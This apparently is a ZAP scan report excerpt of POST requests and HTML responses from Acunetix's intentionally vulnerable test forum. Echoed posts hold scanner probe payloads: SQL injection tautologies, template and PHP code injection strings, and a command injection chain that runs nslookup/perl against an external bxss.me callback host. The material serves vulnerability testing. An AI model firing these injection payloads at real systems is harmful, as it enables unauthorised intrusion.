are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3071 |
Response Body - size: 3,071 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>/\xfs.bxss.me</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3127 |
Response Body - size: 3,127 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 2+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 2+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 2+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3062 |
Response Body - size: 3,062 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>995022</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3115 |
Response Body - size: 3,115 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx{{98991*97996}}xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx{{98991*97996}}xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx{{98991*97996}}xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3082 |
Response Body - size: 3,082 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>";print(md5(31337));$a="</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3337 |
Response Body - size: 3,337 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")|(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")&(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3127 |
Response Body - size: 3,127 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3079 |
Response Body - size: 3,079 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious 